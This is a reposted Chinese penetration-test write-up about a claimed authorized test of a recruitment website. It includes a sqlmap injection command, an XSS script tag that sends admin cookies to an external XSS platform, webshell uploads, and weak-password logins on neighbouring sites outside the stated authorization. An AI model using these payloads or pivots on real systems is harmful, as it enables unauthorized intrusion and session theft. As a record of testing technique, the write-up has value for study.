当前位置:站长防黑网防黑文章防黑文章入侵专题

文章正文

授权检测XX人才网

减小字体 增大字体 作者:佚名  来源:本站整理  发布时间:2013-04-19 20:56:30

作者:Liuker 原文:http://www.anying.org/thread-88-1-1.html 转载必须注明。

0x1 前言:实在不知道要写什么文章了。现在的WEB渗透来来去去就那几种手法。所以就拿最近的一个项目写文章好了。

0x2
由于XX人才网被黑,所以找我们公司进行渗透测试。被黑了好几次 漏洞都补的差不多了  渗透难度较大

0x3

必要的信息收集

IP:XXX.XX.XX.X
端口:80
脚本:php
linux+IIS 9.0环境   这里大家应该会奇怪 linux+IIS 环境? 还是IIS9.0   其实很简单的  所谓的IIS9.0 就是apache 修改的

程序是CWEBS ,一套收费的程序

目标站点有用户注册,存在上传

0x4
扫描

工具扫描得到http://www.xxxx.com/info.php
敏感信息得到网站绝对路径等信息 不多写就摘取文章用到的信息
/home/web0906p1/htdocs/info.php
后台地址为http://www.xxxx.com/admin
发现注入
http://www.xxxx.com/?ctl=Query&act=File&typeid=455
存在FCK编辑器
http://www.xxxx.com/plus/FCKedit ... nnectors/test.html#
旁站 58个同为Cwebs

0x6
检测存在的漏洞并且利用

在上传处发现上传目录以用户用户名为上传目录


/upfiles/Person//111.asp/40fe81afefd207b403e3c5acd3a0984c.jpg
非IIS 6.0 无果
试用burpsuite的payload尝试各种后缀唯独过滤PHP 。JSP无法执行

FCK编辑器修改成了白名单无果

注入漏洞利用如下
python "C:\Tools\sqlmapgui\sqlmap.py" -v 1 --beep --eta --batch -u "http://www.xxxx.com/?ctl=Query&act=File&typeid=455" --level=3 --risk=2 --data="XM=1111&SFZ=1" --cookie="PHPSESSID=10f9b3c61c2cd1200a6fd28a37942221" --dbms=mysql --technique BEUST  --union-cols=1-10 --time-sec=5 --banner --current-user --current-db --is-dba --users --dbs

图1
1.jpg

前天 23:16 上传
下载附件 (46.25 KB)
 


然后注入一直提示403
目测NFS防火墙

然后接着看主站发现一个网上咨询
图2

2.jpg

前天 23:16 上传
下载附件 (39.36 KB)
 


然后发现存在XSS
插入代码
<script src="http://xssing.me/api1694"></script>于标题中
图3

3.jpg

前天 23:16 上传
下载附件 (31.3 KB)
 


然后等cookies

0x6

旁站都是cwebs

花了三个小时的时候看旁站

www.1111.com
发现旁站又出网站意见反馈可以上传任意文件
图4

4.jpg

前天 23:16 上传
下载附件 (63.71 KB)
 


然后上传PHP文件得到地址

5.jpg

前天 23:16 上传
下载附件 (31.56 KB)
 


http://1111.com/tell/web_idea.ph ... 540e581f720a2a0.php
蛋疼了
直接下载不过我们可以判断00f3cf0b74840a2b3540e581f720a2a0.php为文件名
然后找到网站的一些文件的路径尝试无果
蛋疼鸟
不过管理也蛋疼了
在利用burpsuite 尝试组合弱口令
直接 1111 1111   (1111这个代表域名)
不过进入后台蛋疼了
很简单的后台

前天 23:16 上传
下载附件 (52.52 KB)
 


后台管理不支持opera
又没有IE6.0
只能利用元素审查得到
http://1111.com//admin/news/news_mng.php
新闻管理界面
点击进入修改一篇新闻
图7

7.jpg

前天 23:16 上传
下载附件 (76.63 KB)
 


有上传根据前台可以上传任意脚本来看后台也是可以任意上传的
上传了php查看源代码得到路径
http://1111.com/images/gist/20130305145927[0].php
图8

8.jpg

前天 23:16 上传
下载附件 (116.52 KB)
 


然后结合我们得到的目标站的路径
/home/web0906p1/htdocs/info.php
尝试跨站
成功看跨
图9

9.jpg

前天 23:16 上传
下载附件 (82.93 KB)
 


然后登录XSS平台cookies也到了
图10

10.jpg

前天 23:16 上传
下载附件 (44.5 KB)
 


然后啊D登录后台
图11

11.jpg

前天 23:16 上传
下载附件 (47.79 KB)
 


就到这吧就写这么多了 累死了

温馨提示:您正在浏览的是来自站长防黑网收集的文章【授权检测XX人才网

Tags:

站长推荐相关文章
  • 授权检测XX人才网
  • 好的评价 如果您觉得此文章好,就请您
      0%(0)
    差的评价 如果您觉得此文章差,就请您
      0%(0)

    文章评论

    文章评论 评论内容只代表网友观点,与本站立场无关!
       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    网站首页 关于本站 网站帮助 广告合作 联系我们 免责申明 网站地图  ©2010- zzfhw.com . All rights reserved. 站长防黑网 版权所有